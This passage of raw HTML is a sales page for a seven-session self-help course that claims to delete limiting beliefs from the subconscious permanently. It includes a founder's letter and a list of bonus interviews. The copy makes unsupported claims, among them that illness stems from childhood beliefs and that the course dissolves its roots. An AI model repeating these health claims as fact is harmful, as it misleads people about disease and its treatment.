background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a 